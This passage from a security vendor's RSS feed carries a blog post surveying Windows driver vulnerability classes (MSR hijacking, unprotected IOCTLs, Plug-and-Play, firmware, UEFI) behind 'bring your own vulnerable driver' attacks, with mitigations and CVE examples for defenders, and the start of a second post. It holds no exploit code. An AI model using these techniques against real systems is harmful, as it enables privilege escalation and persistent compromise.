410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Bring Your Own
Vulnerable Driver (BYOVD) techniques are not new; they can be traced back at
least as far as 2012 and the Shamoon wiper that targeted Saudi Aramco. The
attack used RawDisk driver, which could manipulate hard drives from user space
without any special permissions. This access enabled the malicious actor to
erase data &#8230; <a
href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Bring
Your Own Backdoor: How Vulnerable Drivers Let Hackers In</a> appeared first on
<a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/20 ]]>
<![CDATA[ 22/05/Threat-Analysis-Unit_410x222-300x162.png 300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p aria-level="1"><span
data-contrast="auto">Bring Your Own Vulnerable Driver (BYOVD) techniques are not
new; th ]]>
<![CDATA[ ey can be traced back at least as far as 2012 and the </span><a
href="https://en.wikipedia.org/wiki/Shamoon"><span
data-contrast="none">Shamoon</span></a><span data-contrast="auto"> wiper that
targeted Saudi Aramco. The attack used </span><a
href="https://attack.mitre.org/software/S0364/"><span data ]]>
<![CDATA[ -contrast="none">RawDisk driver</span></a><span data-contrast="auto">,
which could manipulate hard drives from user space without any special
permissions. This access enabled the malicious actor to erase data at such a
large scale, the company was forced to replace practically all hard drives on
its ]]>
<![CDATA[ network. The Shamoon/RawDisk driver attack did not use a vulnerability
in the driver, it used the driver for the purpose intended, but by a person or
group with unscrupulous objectives. In the case of Shamoon, the driver itself
could be considered a vulnerability, and in some ways, this is the case ]]>
<![CDATA[ with almost all vulnerabilities. The misuse of well-intended segments
of code necessary for functionality results in calamity. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">This paper provides ]]>
<![CDATA[ an overview of common driver vulnerabilities for currently supported
versions of Windows running on x86-64 architecture. Some driver principles and
concepts can be applied across operating systems, but for brevity the scope is
limited. It is intended as a high-level overview introduction to the top ]]>
<![CDATA[ ic of driver vulnerabilities in Windows. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">What is a driver?</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529& ]]>
<![CDATA[
quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">At an exceedingly high level, drivers are software
that allows the operating system to interact with all the different physical
parts of a com ]]>
<![CDATA[ puter. Each physical component of a computer is commonly referred to
as a device, which is why drivers are commonly referred to as device drivers.
This differentiates them from purely software drivers which are low-level
programs that act as filters or perform some other low-level function. It is no
]]>
<![CDATA[ rmal for each device on the computer to have at least one driver. For
example, in high-performance computing, it is common to have a separate card or
piece of hardware for processing video (video card). In general, the
manufacturer of the video card will write a driver or multiple drivers, at least
]]>
<![CDATA[ one for each supported operating system. These drivers facilitate
communication between the physical device and the operating system and enable
full use of the specialized hardware. Since device drivers act as a bridge
between the operating system and physical hardware, it follows that they require
]]>
<![CDATA[ intimate access to the guarded components of the operating system that
not all applications are allowed to use. For this reason, they are an attractive
option for dishonest cyber actors whose goal is to implant undetectable,
difficult-to-remove malicious code on a system.</span><span data-ccp-props= ]]>
<![CDATA[
"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Admittedly, this is an oversimplification but
provides a baseline for understanding the techniques that follow. For a more
complete explanation of Windows drivers see Microsoft ]]>
<![CDATA[ ’s, “</span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/what-is-a-driver-"><span
data-contrast="none">What is a driver?</span></a><span
data-contrast="auto">”  </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;3355597
]]>
<![CDATA[ 40&quot;:259}"> </span></p> <h2 aria-level="1"><span
data-contrast="none">What makes a driver vulnerable?</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span
]]>
<![CDATA[ ></h2> <p><span data-contrast="auto">Since drivers are software, they
are susceptible to all the vulnerabilities of software in general, but the below
provides a high-level overview of the most common vulnerabilities specific to
drivers. In most cases, some combination or variation of these techniqu ]]>
<![CDATA[ es is used for driver exploitation. Like in other instances of
software exploitation, many of these constructs which are manipulated are also
required for normal use in the operation of a system, and when abused, these
same constructs can result in behaviors not intended by the original
authors.</sp ]]>
<![CDATA[ an><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Function Calls from Model Specific
Registers (MSRs)</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,& ]]>
<![CDATA[
quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><a
href="http://datasheets.chipdb.org/Intel/x86/Pentium/Embedded%20Pentium%AE%20Processor/MDELREGS.PDF"><span
data-contrast="none">Model-specific registers</span></a><span data-cont ]]>
<![CDATA[ rast="auto"> (MSRs) are a set of special-purpose data holding places
on most computer processors that are available to drivers that are used for
debugging, performance monitoring, and enabling/disabling CPU/GPU features. One
common use of these registers is to collect environmental measurements rela ]]>
<![CDATA[ ted to the driver’s hardware, for example, temperature or voltage.
These data points can be essential for the device to function properly.
</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">A close ]]>
<![CDATA[ r look at how MSRs operate reveals the problem. Within the set of MSRs
one register is of particular interest, </span><a
href="https://software.intel.com/content/www/us/en/develop/download/intel-64-and-ia-32-architectures-software-developers-manual-volume-4-model-specific-registers.html"><span
data- ]]>
<![CDATA[ contrast="none">IA32_LSTAR</span></a><span data-contrast="auto">
(IA-32e Mode System Call Target Address R/W), commonly referred to as the
shortened LSTAR. This register allows drivers to make system calls. Normal
operation dictates that the driver places the address of the system call it
wants to m ]]>
<![CDATA[ ake in the LSTAR register, and then signals for it to be called. A
system call is a function or action that triggers something to happen in the
operating system itself; these types of operations are considered privileged and
only trusted software is allowed to use them. Since drivers are trusted, th ]]>
<![CDATA[ is is not a problem. However, in the case of a basic MSR attack the
address of the system call in LSTAR is replaced with the address of the
non-trusted code. Now when the driver triggers what it thinks is a system call,
the imposter code is executed as if it were a trusted part of the operating syst
]]>
<![CDATA[ em. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Techniques that involve overwriting the LSTAR
register are no longer quite as straightforward as presented. Microsoft has
implemented security measures to make abuse more complicated, but the basics of
the technique remain the same. The difference is that it now requires multiple
exploits to place the untrusted code in memory, change LSTAR, and subsequently
trigger the system call.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong>Microsoft’s Mitigations </strong><br /> <a
href="https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10"><span
data-contrast="none">Supervisory Mode Execution Prevention
(SMEP)</span></a><span data-contrast="auto"> – Prevents the kernel from
executing code in user pages. </span><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/vbs-resource-protections"><span
data-contrast="none">Virtualization-Based Security (VBS)</span></a><span
data-contrast="auto"> – Restricts access to MSRs and reviews MSR events
(successor of </span><a
href="https://windows-internals.com/hyperguard-secure-kernel-patch-guard-part-1-skpg-initialization/"><span
data-contrast="none">PatchGuard</span></a><span
data-contrast="auto">)</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none"><strong>Notable Example:</strong>  </span><a
href="https://www.microsoft.com/en-us/security/blog/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/"><span
data-contrast="none">WannaCrypt</span></a><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Unprotected IOCTL
Requests</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><a
href="https://learn.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-"><span
data-contrast="none">IOCTL</span></a><span data-contrast="auto"> Requests are a
property and feature of drivers that purposefully allow untrusted or user-mode
programs to interact directly with the underlying trusted parts of a driver’s
code and subsequently the operating system. For example, when installing a new
peripheral device like a video card, there are usually multiple components. One
will be a driver for the video card itself and another will be a user interface
for tuning how video is processed and displayed. The driver is trusted, and the
user interface application is not. Out of necessity, there are predetermined
user interactions within the video card user application that can trigger events
that run code in the trusted driver. Vulnerabilities occur when the
communication between the untrusted and trusted is taken advantage of by a third
party. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Drivers that contain this type of vulnerability
share a commonality, accessible IOCTL codes or commands. IOCTL commands are
32-bit values, represented in hex (example: 0x12345678), which can be called
from untrusted parts of the operating system to execute code in the trusted
part. These commands are </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/defining-i-o-control-codes"><span
data-contrast="none">defined by the author of the driver</span></a><span
data-contrast="auto"> and can execute the most protected operating system calls.
For example, a video card application can send hardware configuration changes to
increase how quickly data is processed. To accomplish this the untrusted user
application must be able to communicate with the video card itself. This is
possible because the driver contains a predefined </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/creating-ioctl-requests-in-drivers"><span
data-contrast="none">IOCTL Request</span></a><span data-contrast="auto"> that
the user application can issue to it. The order of events is, the OS video card
application connects to the device driver, sometimes authenticates itself, and
sends the command along with any compulsory data (the new settings).
Vulnerabilities arise when access to these IOCTL operations is not adequately
restricted.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">One example of this type of vulnerability is when
an unsecured IOCTL Request can perform arbitrary memory writes. For example,
there are IOCTL Requests that result in calls to </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-mmmapiospace"><span
data-contrast="none">MmMapIOSpace</span></a><span data-contrast="auto">, which
maps physical to virtual addresses. Two examples of this are </span><a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15368"><span
data-contrast="none">CVE-2020-15368</span></a><span data-contrast="auto"> and
</span><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15481"><span
data-contrast="none">CVE-2020-15481</span></a><span data-contrast="auto">, in
both cases unprotected IOCTL commands result in the ability to run untrusted
code by writing it directly to arbitrary physical memory.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">The scope of </span><a
href="https://cwe.mitre.org/data/definitions/782.html"><span
data-contrast="none">IOCTL Request vulnerabilities</span></a><span
data-contrast="auto"> is much larger and goes beyond writing to arbitrary memory
and extends to almost any operation available in the operating system. What bad
actors can accomplish with this type of vulnerability is completely dependent on
what the driver has defined in IOCTLs, and how security is implemented to
prevent unintended use. For this reason, this type of vulnerability is
particularly troubling and difficult to defend against, and in an unscientific
randomized sampling of vulnerable drivers, it was also the most
common. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong>Microsoft’s Mitigations</strong><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/security-issues-for-i-o-control-codes"><span
data-contrast="none">Security Recommendations for I/O Control
Codes</span></a><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/applying-security-descriptors-on-the-device-object"><span
data-contrast="none">Applying Security Descriptors on the Device
Object</span></a><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong>Notable Examples</strong><br /> <a
href="https://asec.ahnlab.com/wp-content/uploads/2022/10/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Oct-05-2022-3.pdf"><span
data-contrast="none">Lazarus Group’s Rootkit</span></a><br /> <a
href="https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"><span
data-contrast="none">InvisiMole</span></a><br /> <a
href="https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf"><span
data-contrast="none">Slingshot</span></a><br /> <a
href="https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/"><span
data-contrast="none">BlackByte</span></a><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Plug-and-Play Driver
Vulnerabilities</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">It is great when things “just work,” which is
probably why Windows introduced </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-plug-and-play"><span
data-contrast="none">Plugin and Play (PnP)</span></a><span data-contrast="none">
device drivers</span><span data-contrast="auto">. This feature of Windows allows
the operating system to seamlessly adjust to hardware changes with minimal user
interaction. A common example where this comes into play is when a peripheral
device like a keyboard is plugged into a computer while Windows is already
running. Windows recognizes the new hardware and, in most cases, makes it
available for use very quickly. This ease of use can lead to a false sense of
security. PnP drivers are still drivers and susceptible to all the
vulnerabilities discussed and unfortunately more. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">The convenience that PnP offers is delivered by
</span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/pnp-components"><span
data-contrast="none">additional software layers</span></a><span
data-contrast="auto"> in both trusted and untrusted parts of the operating
system. These allow Windows to recognize hardware changes, allocate memory on
behalf of a device, load a driver, and provide some basic components needed by
most drivers. To seamlessly install a PnP device, the OS must grant some level
of trust to it at some point during the installation, and this is where most PnP
vulnerabilities arise and lead to privilege escalation.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">From an attacker’s perspective, PnP drivers are
beneficial because they can be loaded and unloaded from untrusted user mode with
no user interaction. Additionally, you may think this type of vulnerability
requires physical access, but this is not the case. </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil"><span
data-contrast="none">Physical access is not required</span></a><span
data-contrast="auto">. Generally, vulnerabilities in PnP device drivers provide
privilege escalation, which opens the door for other attacks.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Note: PnP Drivers should not be confused with
</span><a
href="https://learn.microsoft.com/en-us/windows/win32/upnp/overview-of-universal-plug-and-play"><span
data-contrast="none">UPnP (Universal Plug and Play)</span></a><span
data-contrast="auto">, which is a protocol for dynamic network device
discovery.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p aria-level="3"><strong>Possible Mitigation </strong><br /> <a
href="https://www.bleepingcomputer.com/news/microsoft/how-to-block-windows-plug-and-play-auto-installing-insecure-apps/"><span
data-contrast="none">DisableCoInstallers Registry Key</span></a><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></p>
<p aria-level="3"><strong>Notable Example</strong><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></p>
<p><a
href="https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/"><span
data-contrast="none">PnP Mouse Privilege Escalation</span></a><br /> <a
href="https://windows-internals.com/printdemon-cve-2020-1048/"><span
data-contrast="none">CVE-2020-1048</span></a><span data-contrast="auto"> – Print
Spooler</span><br /> <a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675"><span
data-contrast="none">CVE-2021-1675</span></a><span data-contrast="auto">,
</span><a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527"><span
data-contrast="none">CVE-2021-34527</span></a><span data-contrast="auto">
&#8211; Print Nightmare</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Firmware Update
Vulnerabilities</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">The introduction provided a definition of a driver
and explained the difference between a device driver, which provides hardware-OS
communication, and a software driver, which acts more like a filter for the
device drivers. There is another type of driver called a </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/system-and-device-firmware-updates-via-a-firmware-driver-package"><span
data-contrast="none">firmware driver</span></a><span data-contrast="auto">. Like
a device driver it is for a single device, but instead of residing in and
facilitating communication with the operating system; it provides instructions
to be stored on the hardware itself. This includes all the definitions and the
logic necessary for the hardware to operate. Firmware drivers are used to load
code onto a specialized chip located on the hardware itself.  This code is
usually placed there by the manufacturer, and for the most part, is not meant to
be changed. For this reason, it is good security practice for the firmware to be
write-protected, however, sometimes a situation arises where an update is
required. This could be a logic error or other oversight that leaves </span><a
href="https://www.bleepingcomputer.com/news/security/hp-fixes-bug-letting-attackers-overwrite-firmware-in-over-200-models/"><span
data-contrast="none">firmware vulnerable to malicious actors</span></a><span
data-contrast="auto">.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Firmware update vulnerabilities do not usually
occur in the firmware driver itself but in the lack of access control dictating
its use. In malicious firmware updates the firmware driver replaces the
manufacturer-approved code for performing logic on the actual hardware with
nontrusted code, and once complete is close to undetectable. While this type of
vulnerability is certainly found on Windows devices, most notably printers. It
is far more prevalent on IoT (Internet of Things) devices. IoT devices consist
of non-traditional end-user systems that are connected to the internet, for
example, cameras, lightbulbs, thermostats, kitchen appliances, and
more.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong>Microsoft Mitigation</strong><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/firmware-attack-surface-reduction"><span
data-contrast="none">Firmware Attack Surface Reduction (FASR)</span></a><br />
<a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/updating-device-firmware-using-windows-update"><span
data-contrast="none">Update device firmware using Windows Update</span></a><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong>Notable example</strong><br /> <a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-21134"><span
data-contrast="none">CVE-2022-21134</span></a><br /> <a
href="https://www.csoonline.com/article/3642988/new-hp-mfp-vulnerabilities-show-why-you-should-update-and-isolate-printers.html"><span
data-contrast="none">FutureSmart Printer Firmware</span></a><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">UEFI and Boot Loader
Vulnerabilities</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">UEFI (Unified Extensible Firmware Interface) is
the modern version of BIOS (Basic Input/Output System), both of which enable a
computer’s hardware to boot the operating system. One benefit of UEFI over BIOS
is that it provides the option for secure boot, which introduced a security
feature that </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/windows-secure-boot-key-creation-and-management-guidance?view=windows-11"><span
data-contrast="none">ensures the integrity of code</span></a><span
data-contrast="auto"> before it executes. UEFI secure boot should only allow
code with valid credentials to run by enforcing authenticity through PKI (Public
Key Infrastructure) and Certificates. For this reason, the UEFI class of driver
vulnerability usually involves disabling or bypassing secure boot to run
unendorsed code. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">UEFI attacks are possible even when the firmware
is not left unprotected. VMware Carbon Black’s own Takahiro Haruyama has done
extensive research into this type of attack, see his blog post, “</span><a
href="https://blogs.vmware.com/security/2021/06/detecting-uefi-bootkits-in-the-wild-part-1.html"><span
data-contrast="none">Detecting UEFI Bookits in the Wild</span></a><span
data-contrast="auto">.”</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p aria-level="3"><strong>Microsoft Mitigation</strong><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></p>
<p><a
href="https://learn.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process"><span
data-contrast="none">Secure the Windows boot process</span></a><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong>Notable Example</strong><br /> <span data-contrast="auto">From ESET
&#8211;  </span><a
href="https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/"><span
data-contrast="none">When “secure” isn’t secure at all: High</span><span
data-contrast="none">‑</span><span data-contrast="none">impact UEFI
vulnerabilities discovered in Lenovo consumer laptops</span></a><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Conclusion</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">This has been an introduction to driver
vulnerabilities and is not meant to be all-encompassing of all possible driver
vulnerabilities. For example, there are additional MSR manipulation
vulnerabilities, which could have been covered but were left out. These involve
manipulating MSR register values, however, the depth of understanding of MSR
registers needed to make a section like that easily comprehensible went beyond
the scope of this brief introduction. Additionally, Microsoft’s
virtualization-based security has made MSR attacks far less prevalent.
</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Network security professionals everywhere spend an
untold number of hours working to patch vulnerabilities in their networks as
they are discovered. This is a monumental task considering the amount of
hardware and software on modern systems. It is no wonder, given all the hours of
demanding work devoted to this when an actor brings their own vulnerable driver
into a fully patched network, security professionals cringe. Not to mention that
many of these so-called vulnerable drivers are signed; why are they not safe?
This overview of driver vulnerabilities has attempted to provide some insight
into this question and provide additional resources to further enrich one’s own
knowledge of the topic. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Protections</span><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">Carbon Black offers multiple out-of-the-box
protections against Bring Your Own Vulnerable Driver attacks. The simplest
method of protection provided is alerting on or prohibiting known abused drivers
in a network. As soon as a vulnerable driver is disclosed, it is added to a
known malware list independent of the validity of the file signature. Secondly,
a universal requirement of BYOVD attacks is that the vulnerable driver must be
installed in the operating system. In the case of BYOVD attacks, the steps
required to move the vulnerable driver to the targeted system and then install
it are very similar to well-known cyber-attack chains.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">One strength of the Carbon Black line of products
is the unparalleled ability to identify, alert, and block cyber-attack chains.
Additionally, it&#8217;s endpoint software tracks applications that load data or
code into memory, which includes drivers, so any driver loaded into memory will
result in an alert or potential block depending on the policy. Finally, Carbon
Black products have the capacity to alert on or block the installation of
drivers by unknown applications, which stops BYOVD attacks before they progress.
All of these individual protections work together to provide a comprehensive
defensive strategy that guards against malware even when it uses signed
drivers.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Bring
Your Own Backdoor: How Vulnerable Drivers Let Hackers In</a> appeared first on
<a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>XDR: Identity Matters – Who You Know is As Important as What You
Know</title>
<link>https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html?utm_source=rss&utm_medium=rss&utm_campaign=xdr-identity-matters-who-you-know-is-as-important-as-what-you-know</link>
<dc:creator>
<![CDATA[ Justin Falck ]]>
...
</dc:creator>
<pubDate>Tue, 18 Apr 2023 15:00:02 +0000</pubDate>
<category>
<![CDATA[ Endpoint Security ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83441</guid>
<description>
<![CDATA[ <div><img width="300" height="190"
src="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png
300w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1024x650.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-768x488.png
768w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1536x975.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-2048x1300.png
2048w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-600x381.png
600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Endpoint security is
recognizably an essential part of modern cybersecurity, and endpoint security
tools are in many cases a first and last line of defense. Endpoint security is
focused on securing servers, workloads, end-user workstations, laptops, and any
other devices that are used to access corporate networks and SaaS
applications.    Generally, endpoint security is regarded &#8230; <a
href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">XDR:
Identity Matters – Who You Know is As Important as What You Know</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="190"
src="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png
300w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1024x650.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-768x488.png
768w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1536x975.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-2048x1300.png
2048w,
